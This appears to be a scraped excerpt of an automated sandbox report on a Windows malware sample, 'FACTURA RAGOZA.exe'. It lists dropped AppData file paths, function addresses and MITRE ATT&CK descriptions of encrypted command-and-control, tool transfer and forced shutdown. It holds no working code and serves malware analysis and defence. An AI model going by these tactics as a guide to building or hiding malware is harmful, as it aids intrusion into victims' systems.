C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\strudsfjerenes.uns

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\unnamed.jpg

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\aktivitetsrunde.txt

Windows Analysis Report
FACTURA RAGOZA.exe

Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 004048C5 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481
windowmemoryCOMMON

Function 00405D51 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C66 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182
COMMON

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre